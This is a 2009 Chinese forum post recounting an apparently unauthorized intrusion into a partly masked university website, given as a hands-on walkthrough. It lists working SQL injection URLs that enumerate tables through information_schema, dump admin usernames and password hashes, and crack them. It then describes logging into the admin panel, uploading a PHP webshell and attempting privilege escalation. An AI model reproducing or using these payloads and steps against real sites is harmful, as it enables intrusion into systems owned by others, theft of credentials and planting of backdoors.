|
|
题记:很菜的文章,高手莫笑!,因为写文章是一个多月前的事情,漏洞补上没不清楚~~,如果没补上,请各位不要做任何破坏!转载请注明出处!原文链接:http://hi.baidu.com/myliuyao/blog/item/7c6c38ca04674f8ec8176848.html
首先打开网站,找个带参数的链接顺手加个单引号,报错了!如图一。很高兴,看来是有戏了。继续提交http://www.XX.edu.cn/php/viewart.php?ID=1040%20and%201=1(为了不必要的麻烦网站域名用XX代替,其中%20是URL编码代表空格)返回正常。再接着提交
http://www.XX.edu.cn/php/viewart.php?ID=1040%20and%201=2返回不正常页面,明显的注入点。嘿嘿,看来他们学校网站的安全性也不怎么好。赶紧拿出工具去跑表名和列名(偶们小菜就喜欢工具,方便实用啊!),结果是一无所获,没跑出什么有意义的东西。没关系,咱们继续手工注入。从图一的报错中已经知道网站使用的是mysql数据库,但是mysql4.0版本以上才支持union联合查询。所以继续提交http://www.XX.edu.cn/php/viewart.php?ID=1040%20and%20ord(mid(version(),1,1))>51,结果返回正常,证明是支持联合查询的。然后利用order by语句判断列数,多么经典的东东啊,历久不衰,呵呵。最后判断出列数为4.利用联合查询,继续提交http://www.XX.edu.cn/php/viewart.php?ID=1040%20and%201=2%20union%20select%201,2,3,4,如图2.然后再查看数据库的版本,用户名,数据库,分别用到函数version(),user(),database()。继续提交
http://www.XX.edu.cn/php/viewart.php?ID=1040%20and%201=2%20union%20select%20database(),user(),3,version(),返回如图三的页面。不是root权限,也没有读取的权限,无法利用load_file()函数。但是没关系,数据库是5.0以上的版本可以利用它的information_schema视图爆出表和列。呵呵,这回真的有戏了。休息下,咱们继续射之。
我们构造语句http://www.XX.edu.cn/php/viewart.php?ID=1040%20and%201=2%20union%20select%201,2,3,table_name%20from%20information_schema.tables%20where%20TABLE_SCHEMA=0x7367676E657773%20limit%200,1提交后,返回图四。呵呵,第一个表就是管理员的表。这里TABLE_SCHEMA后面的值是当前数据库名。之前我们已经知道数据库名sggnews,利用ascii及进制转换工具(呵呵,很不错的东东),转换成16进制。如果想继续爆出其他表名,可以改变limit后面的值,这里我就不一一演示了。表名爆出来后紧接着就是爆字段名。再构造语句http://www.XX.edu.cn/php/viewart.php?ID=1040%20and%201=2%20union%20select%201,2,3,COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_NAME=0x646564655F61646D696E%20limit%200,1返回图五。TABLE_NAME后面的值就是刚刚爆出表名dede_admin的16进制。通过改变limit后面的值,可以爆出其他字段,最后确定管理员密码字段是pwd,用户名字段是uname。好了,管理账号密码字段全部搞定,我们现在就利用联合查询去爆出管理员账号密码。
先来提交这样的语句http://www.XX.edu.cn/php/viewart.php?ID=1040%20and%201=2%20union%20select%201,max(id),3,min(id)%20from%20dede_admin返回图六。该语句是查询dede_admin表中字段id的最小值与最大值,方便后面查询管理账号密码。可以看出一共有五个账号。呵呵,我们一个一个的来射之。继续构造语句http://www.XX.edu.cn/php/viewart.php?ID=1040%20and%201=2%20union%20select%201,pwd,3,uname%20from%20dede_admin%20where%20id=1返回图七,成功查到管理帐号密码。然后改变id的值,就可以爆出所有管理员的账号密码。重复工作就不占用版面了,呵呵。
把爆出来的管理密码拿到cmd5网上去查询,结果五个密码查到了一个。哈哈,赶紧到后台去登陆。结果很囧,提示用户名错误。我汗,大汗,瀑布汗,难道我之前做的都是无用功?老天也太不眷顾我了吧。还是不死心,用其他几个用户名进行登陆密码乱写,最后发现五个用户名只有三个是正确的。可那三个密码是付费的,汗,换个查询网站试试,到xmd5去试试。结果,我RP太好了,居然查出来了。囧,赶紧登陆后台,如图八。
后台不仅有数据库还可以上传任意文件,呵呵,直接传了一个Reddragonfly的php大马,如图九。紧接着当然是提权拿服务器,试过很多方法udf.dll提权,上传aspshell等等,都没拿下服务器。(呵呵,偶是菜鸟,提权也不是很在行),最后只好作罢。本来此次入侵的目的就只是检测网站安全性,目的算是达到了吧!
本次入侵并没有什么新技术,都是一些前辈们用滥的方法。最重要的是要懂得灵活运用,多动手练习。只有在实战中才能得到真正的提高。因为实战才能遇到问题,才会努力去解决,最终得到提高。本文只是提供一个入侵思路,拿出来和大家分享,希望能够共同进步。
图一: |
|
发表于 2009-6-4 10:37:57
